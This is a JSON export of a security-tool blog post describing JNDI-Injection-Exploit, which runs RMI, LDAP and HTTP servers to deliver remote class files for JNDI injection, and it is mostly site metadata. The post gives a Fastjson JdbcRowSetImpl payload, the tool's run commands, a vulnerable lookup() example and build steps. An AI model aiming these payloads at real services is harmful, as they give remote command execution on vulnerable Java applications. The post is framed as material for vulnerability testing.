{"id":23516,"date":"2022-03-30T16:01:52","date_gmt":"2022-03-30T16:01:52","guid":{"rendered":"https:\/\/kalilinuxtutorials.com\/?p=23516"},"modified":"2022-03-30T16:01:54","modified_gmt":"2022-03-30T16:01:54","slug":"jndi-injection-exploit","status":"publish","type":"post","link":"https:\/\/kalilinuxtutorials.com\/jndi-injection-exploit\/","title":{"rendered":"JNDI-Injection-Exploit : A Tool Which Generates JNDI Links Can Start Several Servers"},"content":{"rendered":"\n<p><strong>JNDI-Injection-Exploit<\/strong> is a tool for generating workable JNDI links and provide background services by starting RMI server, LDAP server and HTTP server. RMI server and LDAP server are based on&nbsp;marshals&nbsp;and modified further to link with HTTP server.<\/p>\n\n\n\n<p>Using this tool allows you get JNDI links, you can insert these links into your&nbsp;<strong>POC<\/strong>&nbsp;to test vulnerability.<\/p>\n\n\n\n<p>For example, this is a Fastjson vul-poc:<\/p>\n\n\n\n<p class=\"has-vivid-green-cyan-color has-black-background-color has-text-color has-background\"><strong>{&#8220;@type&#8221;:&#8221;com.sun.rowset.JdbcRowSetImpl&#8221;,&#8221;dataSourceName&#8221;:&#8221;rmi:\/\/127.0.0.1:1099\/Object&#8221;,&#8221;autoCommit&#8221;:true}<\/strong><\/p>\n\n\n\n<p>We can replace &#8220;rmi:\/\/127.0.0.1:1099\/Object&#8221; with the link generated by JNDI-Injection-Exploit to test vulnerability.<\/p>\n\n\n\n<h2 class=\"has-text-align-center has-vivid-green-cyan-background-color has-background wp-block-heading\">Usage<\/h2>\n\n\n\n<p>Run as<\/p>\n\n\n\n<p class=\"has-vivid-green-cyan-color has-black-background-color has-text-color has-background\"><strong>$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address]<\/strong><\/p>\n\n\n\n<p>where:<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><strong>-C<\/strong>&nbsp;&#8211; command executed in the remote classfile.(optional , default command is &#8220;open \/Applications\/Calculator.app&#8221;)<\/li><li><strong>-A<\/strong>&nbsp;&#8211; the address of your server, maybe an IP address or a domain.(optional , default address is the first network interface address)<\/li><\/ul>\n\n\n\n<p>Points for attention:<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>make sure your server&#8217;s ports (<strong>1099<\/strong>,&nbsp;<strong>1389<\/strong>,&nbsp;<strong>8180<\/strong>) are available .or you can change the default port in the run.ServerStart class line 26~28.<\/li><li>your command is passed to&nbsp;<strong>Runtime.getRuntime().exec()<\/strong>&nbsp;as parameters, so you need to ensure your command is workable in method exec().<strong>Command in bash like &#8220;bash -c &#8230;.&#8221; need to add Double quotes.<\/strong><\/li><\/ul>\n\n\n\n<h2 class=\"has-text-align-center has-vivid-green-cyan-background-color has-background wp-block-heading\"><a href=\"https:\/\/github.com\/welk1n\/JNDI-Injection-Exploit#examples\"><\/a>Examples<\/h2>\n\n\n\n<p>Local demo:<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>Start the tool like this:<\/li><\/ul>\n\n\n\n<p class=\"has-vivid-green-cyan-color has-black-background-color has-text-color has-background\"><strong>$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C &#8220;open \/Applications\/Calculator.app&#8221; -A &#8220;127.0.0.1&#8221;<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>Assume that we inject the JNDI links like rmi:\/\/ADDRESS\/jfxllc generated in step 1 to a vulnerable application which can be attacked by JNDI injection.<\/li><\/ul>\n\n\n\n<p>In this example, it looks like this:<\/p>\n\n\n\n<p class=\"has-vivid-green-cyan-color has-black-background-color has-text-color has-background\"><strong>public static void main(String[] args) throws Exception{<br>InitialContext ctx = new InitialContext();<br>ctx.lookup(&#8220;rmi:\/\/127.0.0.1\/fgf4fp&#8221;);<br>}<\/strong><\/p>\n\n\n\n<p>then when we run this code, the command will be executed ,<\/p>\n\n\n\n<p>and the log will be printed in shell.<\/p>\n\n\n\n<h2 class=\"has-text-align-center has-vivid-green-cyan-background-color has-background wp-block-heading\">Installation<\/h2>\n\n\n\n<p>We can select one of the two methods to get the jar.<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>Download the latest jar from&nbsp;Release.<\/li><li>Clone the source code to local and build (Requires Java 1.8+ and Maven 3.x+).<\/li><\/ul>\n\n\n\n<p class=\"has-vivid-green-cyan-color has-black-background-color has-text-color has-background\"><strong>$ git clone https:\/\/github.com\/welk1n\/JNDI-Injection-Exploit.git<\/strong><\/p>\n\n\n\n<p class=\"has-vivid-green-cyan-color has-black-background-color has-text-color has-background\"><strong>$ cd JNDI-Injection-Exploit<\/strong><\/p>\n\n\n\n<p class=\"has-vivid-green-cyan-color has-black-background-color has-text-color has-background\"><strong>$ mvn clean package -DskipTests<\/strong><\/p>\n\n\n\n<div class=\"wp-block-buttons is-content-justification-center is-layout-flex wp-container-core-buttons-is-layout-16018d1d wp-block-buttons-is-layout-flex\">\n<div class=\"wp-block-button is-style-outline is-style-outline--1\"><a class=\"wp-block-button__link has-vivid-cyan-blue-background-color has-background\" href=\"https:\/\/github.com\/welk1n\/JNDI-Injection-Exploit\"><strong>Download<\/strong><\/a><\/div>\n<\/div>\n","protected":false},"excerpt":{"rendered":"<p>JNDI-Injection-Exploit is a tool for generating workable JNDI links and provide background services by starting RMI server, LDAP server and HTTP server. RMI server and LDAP server are based on&nbsp;marshals&nbsp;and modified further to link with HTTP server. Using this tool allows you get JNDI links, you can insert these links into your&nbsp;POC&nbsp;to test vulnerability. For [&hellip;]<\/p>\n","protected":false},"author":4,"featured_media":23525,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEibchg98Zt_4QFlDcec_tny2jQcLcjCU9HLo94uCkaPcpFaE-DF9zYqX72N1WKE6yIkrnikxEgg7Oi_hJdpDWYyfV8IwpbGrBZv1rxz8JzhcPN0gf_BiXfKGvWW4OyF3yX2GLQIK6cs5W04ERNiGX_hOLxx8xMc8lZod4YRISmT6MReIg2kNFSJwWWs\/s728\/JNDI-Exploit-Kit%20(1).png","fifu_image_alt":"","_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[28],"tags":[4977,4976,4978],"class_list":["post-23516","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-kali","tag-jndi-links","tag-jndi-injection-exploit","tag-start-several-servers"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.0 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>JNDI-Injection-Exploit : A Tool Which Generates JNDI Links<\/title>\n<meta name=\"description\" content=\"JNDI-Injection-Exploit is a tool for generating workable JNDI links and provide background services by starting RMI server.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/kalilinuxtutorials.com\/jndi-injection-exploit\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"JNDI-Injection-Exploit : A Tool Which Generates JNDI Links\" \/>\n<meta property=\"og:description\" content=\"JNDI-Injection-Exploit is a tool for generating workable JNDI links and provide background services by starting RMI server.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/kalilinuxtutorials.com\/jndi-injection-exploit\/\" \/>\n<meta property=\"og:site_name\" content=\"Kali Linux Tutorials\" \/>\n<meta property=\"article:published_time\" content=\"2022-03-30T16:01:52+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2022-03-30T16:01:54+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEibchg98Zt_4QFlDcec_tny2jQcLcjCU9HLo94uCkaPcpFaE-DF9zYqX72N1WKE6yIkrnikxEgg7Oi_hJdpDWYyfV8IwpbGrBZv1rxz8JzhcPN0gf_BiXfKGvWW4OyF3yX2GLQIK6cs5W04ERNiGX_hOLxx8xMc8lZod4YRISmT6MReIg2kNFSJwWWs\/s728\/JNDI-Exploit-Kit%20(1).png\" \/>\n<meta name=\"author\" content=\"R K\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:image\" content=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEibchg98Zt_4QFlDcec_tny2jQcLcjCU9HLo94uCkaPcpFaE-DF9zYqX72N1WKE6yIkrnikxEgg7Oi_hJdpDWYyfV8IwpbGrBZv1rxz8JzhcPN0gf_BiXfKGvWW4OyF3yX2GLQIK6cs5W04ERNiGX_hOLxx8xMc8lZod4YRISmT6MReIg2kNFSJwWWs\/s728\/JNDI-Exploit-Kit%20(1).png\" \/>\n<meta name=\"twitter:creator\" content=\"@CyberEdition\" \/>\n<meta name=\"twitter:site\" content=\"@CyberEdition\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"R K\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/jndi-injection-exploit\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/jndi-injection-exploit\/\"},\"author\":{\"name\":\"R K\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/69444b58b9e267a4cf08fceb34b6f6ad\"},\"headline\":\"JNDI-Injection-Exploit : A Tool Which Generates JNDI Links Can Start Several Servers\",\"datePublished\":\"2022-03-30T16:01:52+00:00\",\"dateModified\":\"2022-03-30T16:01:54+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/jndi-injection-exploit\/\"},\"wordCount\":355,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#organization\"},\"image\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/jndi-injection-exploit\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEibchg98Zt_4QFlDcec_tny2jQcLcjCU9HLo94uCkaPcpFaE-DF9zYqX72N1WKE6yIkrnikxEgg7Oi_hJdpDWYyfV8IwpbGrBZv1rxz8JzhcPN0gf_BiXfKGvWW4OyF3yX2GLQIK6cs5W04ERNiGX_hOLxx8xMc8lZod4YRISmT6MReIg2kNFSJwWWs\/s728\/JNDI-Exploit-Kit%20(1).png\",\"keywords\":[\"JNDI Links\",\"JNDI-Injection-Exploit\",\"Start Several Servers\"],\"articleSection\":[\"Kali Linux\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/kalilinuxtutorials.com\/jndi-injection-exploit\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/jndi-injection-exploit\/\",\"url\":\"https:\/\/kalilinuxtutorials.com\/jndi-injection-exploit\/\",\"name\":\"JNDI-Injection-Exploit : A Tool Which Generates JNDI Links\",\"isPartOf\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/jndi-injection-exploit\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/jndi-injection-exploit\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEibchg98Zt_4QFlDcec_tny2jQcLcjCU9HLo94uCkaPcpFaE-DF9zYqX72N1WKE6yIkrnikxEgg7Oi_hJdpDWYyfV8IwpbGrBZv1rxz8JzhcPN0gf_BiXfKGvWW4OyF3yX2GLQIK6cs5W04ERNiGX_hOLxx8xMc8lZod4YRISmT6MReIg2kNFSJwWWs\/s728\/JNDI-Exploit-Kit%20(1).png\",\"datePublished\":\"2022-03-30T16:01:52+00:00\",\"dateModified\":\"2022-03-30T16:01:54+00:00\",\"description\":\"JNDI-Injection-Exploit is a tool for generating workable JNDI links and provide background services by starting RMI server.\",\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/kalilinuxtutorials.com\/jndi-injection-exploit\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/jndi-injection-exploit\/#primaryimage\",\"url\":\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEibchg98Zt_4QFlDcec_tny2jQcLcjCU9HLo94uCkaPcpFaE-DF9zYqX72N1WKE6yIkrnikxEgg7Oi_hJdpDWYyfV8IwpbGrBZv1rxz8JzhcPN0gf_BiXfKGvWW4OyF3yX2GLQIK6cs5W04ERNiGX_hOLxx8xMc8lZod4YRISmT6MReIg2kNFSJwWWs\/s728\/JNDI-Exploit-Kit%20(1).png\",\"contentUrl\":\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEibchg98Zt_4QFlDcec_tny2jQcLcjCU9HLo94uCkaPcpFaE-DF9zYqX72N1WKE6yIkrnikxEgg7Oi_hJdpDWYyfV8IwpbGrBZv1rxz8JzhcPN0gf_BiXfKGvWW4OyF3yX2GLQIK6cs5W04ERNiGX_hOLxx8xMc8lZod4YRISmT6MReIg2kNFSJwWWs\/s728\/JNDI-Exploit-Kit%20(1).png\",\"width\":\"728\",\"height\":\"380\"},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#website\",\"url\":\"https:\/\/kalilinuxtutorials.com\/\",\"name\":\"Kali Linux Tutorials\",\"description\":\"Kali Linux Tutorials\",\"publisher\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/kalilinuxtutorials.com\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#organization\",\"name\":\"Kali Linux Tutorials\",\"url\":\"https:\/\/kalilinuxtutorials.com\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png\",\"contentUrl\":\"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png\",\"width\":272,\"height\":90,\"caption\":\"Kali Linux Tutorials\"},\"image\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/x.com\/CyberEdition\",\"https:\/\/www.threads.com\/@cybersecurityedition\",\"https:\/\/www.linkedin.com\/company\/cyberedition\",\"https:\/\/www.instagram.com\/cybersecurityedition\/\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/69444b58b9e267a4cf08fceb34b6f6ad\",\"name\":\"R K\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/d3937c9687f2da11bc0a716404ff91779fe19ca115208dbf66167ad353aca5aa?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/d3937c9687f2da11bc0a716404ff91779fe19ca115208dbf66167ad353aca5aa?s=96&d=mm&r=g\",\"caption\":\"R K\"},\"url\":\"https:\/\/kalilinuxtutorials.com\/author\/ranjith\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"JNDI-Injection-Exploit : A Tool Which Generates JNDI Links","description":"JNDI-Injection-Exploit is a tool for generating workable JNDI links and provide background services by starting RMI server.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/kalilinuxtutorials.com\/jndi-injection-exploit\/","og_locale":"en_US","og_type":"article","og_title":"JNDI-Injection-Exploit : A Tool Which Generates JNDI Links","og_description":"JNDI-Injection-Exploit is a tool for generating workable JNDI links and provide background services by starting RMI server.","og_url":"https:\/\/kalilinuxtutorials.com\/jndi-injection-exploit\/","og_site_name":"Kali Linux Tutorials","article_published_time":"2022-03-30T16:01:52+00:00","article_modified_time":"2022-03-30T16:01:54+00:00","og_image":[{"url":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEibchg98Zt_4QFlDcec_tny2jQcLcjCU9HLo94uCkaPcpFaE-DF9zYqX72N1WKE6yIkrnikxEgg7Oi_hJdpDWYyfV8IwpbGrBZv1rxz8JzhcPN0gf_BiXfKGvWW4OyF3yX2GLQIK6cs5W04ERNiGX_hOLxx8xMc8lZod4YRISmT6MReIg2kNFSJwWWs\/s728\/JNDI-Exploit-Kit%20(1).png","type":"","width":"","height":""}],"author":"R K","twitter_card":"summary_large_image","twitter_image":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEibchg98Zt_4QFlDcec_tny2jQcLcjCU9HLo94uCkaPcpFaE-DF9zYqX72N1WKE6yIkrnikxEgg7Oi_hJdpDWYyfV8IwpbGrBZv1rxz8JzhcPN0gf_BiXfKGvWW4OyF3yX2GLQIK6cs5W04ERNiGX_hOLxx8xMc8lZod4YRISmT6MReIg2kNFSJwWWs\/s728\/JNDI-Exploit-Kit%20(1).png","twitter_creator":"@CyberEdition","twitter_site":"@CyberEdition","twitter_misc":{"Written by":"R K","Est. reading time":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/kalilinuxtutorials.com\/jndi-injection-exploit\/#article","isPartOf":{"@id":"https:\/\/kalilinuxtutorials.com\/jndi-injection-exploit\/"},"author":{"name":"R K","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/69444b58b9e267a4cf08fceb34b6f6ad"},"headline":"JNDI-Injection-Exploit : A Tool Which Generates JNDI Links Can Start Several Servers","datePublished":"2022-03-30T16:01:52+00:00","dateModified":"2022-03-30T16:01:54+00:00","mainEntityOfPage":{"@id":"https:\/\/kalilinuxtutorials.com\/jndi-injection-exploit\/"},"wordCount":355,"commentCount":0,"publisher":{"@id":"https:\/\/kalilinuxtutorials.com\/#organization"},"image":{"@id":"https:\/\/kalilinuxtutorials.com\/jndi-injection-exploit\/#primaryimage"},"thumbnailUrl":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEibchg98Zt_4QFlDcec_tny2jQcLcjCU9HLo94uCkaPcpFaE-DF9zYqX72N1WKE6yIkrnikxEgg7Oi_hJdpDWYyfV8IwpbGrBZv1rxz8JzhcPN0gf_BiXfKGvWW4OyF3yX2GLQIK6cs5W04ERNiGX_hOLxx8xMc8lZod4YRISmT6MReIg2kNFSJwWWs\/s728\/JNDI-Exploit-Kit%20(1).png","keywords":["JNDI Links","JNDI-Injection-Exploit","Start Several Servers"],"articleSection":["Kali Linux"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/kalilinuxtutorials.com\/jndi-injection-exploit\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/kalilinuxtutorials.com\/jndi-injection-exploit\/","url":"https:\/\/kalilinuxtutorials.com\/jndi-injection-exploit\/","name":"JNDI-Injection-Exploit : A Tool Which Generates JNDI Links","isPartOf":{"@id":"https:\/\/kalilinuxtutorials.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/kalilinuxtutorials.com\/jndi-injection-exploit\/#primaryimage"},"image":{"@id":"https:\/\/kalilinuxtutorials.com\/jndi-injection-exploit\/#primaryimage"},"thumbnailUrl":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEibchg98Zt_4QFlDcec_tny2jQcLcjCU9HLo94uCkaPcpFaE-DF9zYqX72N1WKE6yIkrnikxEgg7Oi_hJdpDWYyfV8IwpbGrBZv1rxz8JzhcPN0gf_BiXfKGvWW4OyF3yX2GLQIK6cs5W04ERNiGX_hOLxx8xMc8lZod4YRISmT6MReIg2kNFSJwWWs\/s728\/JNDI-Exploit-Kit%20(1).png","datePublished":"2022-03-30T16:01:52+00:00","dateModified":"2022-03-30T16:01:54+00:00","description":"JNDI-Injection-Exploit is a tool for generating workable JNDI links and provide background services by starting RMI server.","inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/kalilinuxtutorials.com\/jndi-injection-exploit\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/kalilinuxtutorials.com\/jndi-injection-exploit\/#primaryimage","url":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEibchg98Zt_4QFlDcec_tny2jQcLcjCU9HLo94uCkaPcpFaE-DF9zYqX72N1WKE6yIkrnikxEgg7Oi_hJdpDWYyfV8IwpbGrBZv1rxz8JzhcPN0gf_BiXfKGvWW4OyF3yX2GLQIK6cs5W04ERNiGX_hOLxx8xMc8lZod4YRISmT6MReIg2kNFSJwWWs\/s728\/JNDI-Exploit-Kit%20(1).png","contentUrl":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEibchg98Zt_4QFlDcec_tny2jQcLcjCU9HLo94uCkaPcpFaE-DF9zYqX72N1WKE6yIkrnikxEgg7Oi_hJdpDWYyfV8IwpbGrBZv1rxz8JzhcPN0gf_BiXfKGvWW4OyF3yX2GLQIK6cs5W04ERNiGX_hOLxx8xMc8lZod4YRISmT6MReIg2kNFSJwWWs\/s728\/JNDI-Exploit-Kit%20(1).png","width":"728","height":"380"},{"@type":"WebSite","@id":"https:\/\/kalilinuxtutorials.com\/#website","url":"https:\/\/kalilinuxtutorials.com\/","name":"Kali Linux Tutorials","description":"Kali Linux Tutorials","publisher":{"@id":"https:\/\/kalilinuxtutorials.com\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/kalilinuxtutorials.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/kalilinuxtutorials.com\/#organization","name":"Kali Linux Tutorials","url":"https:\/\/kalilinuxtutorials.com\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/","url":"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png","contentUrl":"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png","width":272,"height":90,"caption":"Kali Linux Tutorials"},"image":{"@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/CyberEdition","https:\/\/www.threads.com\/@cybersecurityedition","https:\/\/www.linkedin.com\/company\/cyberedition","https:\/\/www.instagram.com\/cybersecurityedition\/"]},{"@type":"Person","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/69444b58b9e267a4cf08fceb34b6f6ad","name":"R K","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/d3937c9687f2da11bc0a716404ff91779fe19ca115208dbf66167ad353aca5aa?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/d3937c9687f2da11bc0a716404ff91779fe19ca115208dbf66167ad353aca5aa?s=96&d=mm&r=g","caption":"R K"},"url":"https:\/\/kalilinuxtutorials.com\/author\/ranjith\/"}]}},"jetpack_featured_media_url":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEibchg98Zt_4QFlDcec_tny2jQcLcjCU9HLo94uCkaPcpFaE-DF9zYqX72N1WKE6yIkrnikxEgg7Oi_hJdpDWYyfV8IwpbGrBZv1rxz8JzhcPN0gf_BiXfKGvWW4OyF3yX2GLQIK6cs5W04ERNiGX_hOLxx8xMc8lZod4YRISmT6MReIg2kNFSJwWWs\/s728\/JNDI-Exploit-Kit%20(1).png","jetpack_sharing_enabled":true,"jetpack-related-posts":[{"id":32011,"url":"https:\/\/kalilinuxtutorials.com\/cve-2024-20931\/","url_meta":{"origin":23516,"position":0},"title":"CVE-2024-20931 &#8211; Bypassing Patched Vulnerabilities In Oracle WebLogic","author":"Varshini","date":"February 8, 2024","format":false,"excerpt":"A vulnerability that serves as a bypass for the patched CVE-2023-21839 in Oracle WebLogic. This article delves into the exploit's mechanics, showcasing its usage and providing insights into its development and implications within the cybersecurity landscape. CVE-2024-20931, this is the bypass of the patch of CVE-2023-21839 Oracle Weblogic Usage: Setup\u2026","rel":"","context":"In &quot;Cyber security&quot;","block_context":{"text":"Cyber security","link":"https:\/\/kalilinuxtutorials.com\/category\/cyber-security\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgRBRt0pZv-9kDkfZ1mLOXzePkq7lLOnqKJvckAu9RwYIUC8_JYXk3u3w6A8lqkqUCQJNQ1fU0H2nGcvAjV-suJYWS0kSZMtNAcVknLfkuVj-gCX32IRcuFDDhuqMiTpGspI3X7PYZ5n8cHsIcd_SXc8LflxmX06y7R7bC1DwjVEC2mgtKaTu4RZmG5umna\/s16000\/Untitled%20design%20%2811%29.webp?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgRBRt0pZv-9kDkfZ1mLOXzePkq7lLOnqKJvckAu9RwYIUC8_JYXk3u3w6A8lqkqUCQJNQ1fU0H2nGcvAjV-suJYWS0kSZMtNAcVknLfkuVj-gCX32IRcuFDDhuqMiTpGspI3X7PYZ5n8cHsIcd_SXc8LflxmX06y7R7bC1DwjVEC2mgtKaTu4RZmG5umna\/s16000\/Untitled%20design%20%2811%29.webp?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgRBRt0pZv-9kDkfZ1mLOXzePkq7lLOnqKJvckAu9RwYIUC8_JYXk3u3w6A8lqkqUCQJNQ1fU0H2nGcvAjV-suJYWS0kSZMtNAcVknLfkuVj-gCX32IRcuFDDhuqMiTpGspI3X7PYZ5n8cHsIcd_SXc8LflxmX06y7R7bC1DwjVEC2mgtKaTu4RZmG5umna\/s16000\/Untitled%20design%20%2811%29.webp?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgRBRt0pZv-9kDkfZ1mLOXzePkq7lLOnqKJvckAu9RwYIUC8_JYXk3u3w6A8lqkqUCQJNQ1fU0H2nGcvAjV-suJYWS0kSZMtNAcVknLfkuVj-gCX32IRcuFDDhuqMiTpGspI3X7PYZ5n8cHsIcd_SXc8LflxmX06y7R7bC1DwjVEC2mgtKaTu4RZmG5umna\/s16000\/Untitled%20design%20%2811%29.webp?resize=700%2C400&ssl=1 2x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgRBRt0pZv-9kDkfZ1mLOXzePkq7lLOnqKJvckAu9RwYIUC8_JYXk3u3w6A8lqkqUCQJNQ1fU0H2nGcvAjV-suJYWS0kSZMtNAcVknLfkuVj-gCX32IRcuFDDhuqMiTpGspI3X7PYZ5n8cHsIcd_SXc8LflxmX06y7R7bC1DwjVEC2mgtKaTu4RZmG5umna\/s16000\/Untitled%20design%20%2811%29.webp?resize=1050%2C600&ssl=1 3x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgRBRt0pZv-9kDkfZ1mLOXzePkq7lLOnqKJvckAu9RwYIUC8_JYXk3u3w6A8lqkqUCQJNQ1fU0H2nGcvAjV-suJYWS0kSZMtNAcVknLfkuVj-gCX32IRcuFDDhuqMiTpGspI3X7PYZ5n8cHsIcd_SXc8LflxmX06y7R7bC1DwjVEC2mgtKaTu4RZmG5umna\/s16000\/Untitled%20design%20%2811%29.webp?resize=1400%2C800&ssl=1 4x"},"classes":[]},{"id":34576,"url":"https:\/\/kalilinuxtutorials.com\/jyso\/","url_meta":{"origin":23516,"position":1},"title":"JYso &#8211; A Comprehensive Guide To Advanced JNDI And Serialization Exploits","author":"Varshini","date":"August 27, 2024","format":false,"excerpt":"JYso\u00a0is a tool that can be used as both ysoserial and JNDIExploit. It also has bypass functions of multiple JNDI high versions, WAF, and RASP. Getting Started Guide Please be sure to take a moment to read this document, which will help you quickly become familiar with JYso! Use documentation\u00a0Wiki.\u2026","rel":"","context":"In &quot;Exploitation Tools&quot;","block_context":{"text":"Exploitation 